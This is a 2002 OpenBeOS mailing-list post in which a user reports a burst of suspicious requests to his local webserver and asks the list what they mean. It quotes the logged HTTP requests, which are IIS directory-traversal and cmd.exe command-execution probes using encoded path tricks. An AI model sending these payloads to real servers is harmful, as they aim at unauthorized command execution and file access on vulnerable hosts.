[openbeos] I think someone tried to hack into my machine

• From: "Daniel Reinhold" <danielr@xxxxxxxxxxxxx>
• To: "Public OBOS mailing list" <openbeos@xxxxxxxxxxxxx>
• Date: Tue, 19 Mar 2002 01:48:34 CST

Ok, this was rather interesting. It happened just about fifteen minutes 
ago (as I'm writing this).

I'm online (PPP dialup) and am also running a local webserver (i.e. 
sending requests to loopback address 127.0.0.1). Yeah, that's asking 
for trouble, at least theoretically. That is, someone on the internet, 
if they happened to get a hold of my (temporary, dynamically assigned) 
IP, could send requests for local files and have them sent back out 
across the network. I've never had anything weird happen before, so 
I've always been pretty blase about the security risk.

Anyway, I'm just testing some news items locally before copying them 
over to the OpenBeOS website (which is my usual MO). Suddenly, I notice 
the Terminal window (largely covered by another window, but partially 
showing) has a flurry of text flying by and the DUN replicant in the 
Deskbar shows lots of bytes transmitting back and forth. Wtf? So I 
uncover the Terminal window (which is running the webserver) and see 
that a number of unusual requests have just been attended to. Here's 
the first one:

GET /scripts/root.exe?/c+dir HTTP/1.0
Host: www
Connnection: close

The remaining requests all look like that but with different URLs. Here 
are the other URLs that were requested:

GET /MSADC/root.exe?/c+dir HTTP/1.0
GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0
GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0
GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+
dir HTTP/1.0
GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+
dir HTTP/1.0
GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c..
/winnt/system32/cmd.exe?/c+dir HTTP/1.0
GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0

To me, that looks all the world like some hacker trying to grab files 
from my local machine. Could there be another explanation?

Of course, I'm running BeOS (and don't have NT) so my local webserver 
just returned a bunch of 404 (Not found) responses. Still, makes you 
wonder.

Has anyone else on this list had any similar experiences? What do you 
make of this?

• Follow-Ups:
  • [openbeos] SV: I think someone tried to hack into my machine
    • From: Mikael Hjerpe
  • [openbeos] Re: I think someone tried to hack into my machine
    • From: Mike Lee
  • [openbeos] Re: I think someone tried to hack into my machine
    • From: Jonathan Tarbox
  • [openbeos] Re: I think someone tried to hack into my machine
    • From: François Revol
  • [openbeos] Re: I think someone tried to hack into my machine
    • From: Benjamin S Carrell

Other related posts:

• » [openbeos] I think someone tried to hack into my machine
• » [openbeos] Re: I think someone tried to hack into my machine
• » [openbeos] Re: I think someone tried to hack into my machine
• » [openbeos] Re: I think someone tried to hack into my machine
• » [openbeos] Re: I think someone tried to hack into my machine
• » [openbeos] Re: I think someone tried to hack into my machine
• » [openbeos] Re: I think someone tried to hack into my machine
• » [openbeos] Re: I think someone tried to hack into my machine
• » [openbeos] Re: I think someone tried to hack into my machine
• » [openbeos] Re: I think someone tried to hack into my machine
• » [openbeos] Re: I think someone tried to hack into my machine

1. Home
2. haiku
3. Archive
4. 03-2002

---

• » Previous by Date
• » Next by Date
• » Related Posts
• » View list details
• » Manage your subscription

---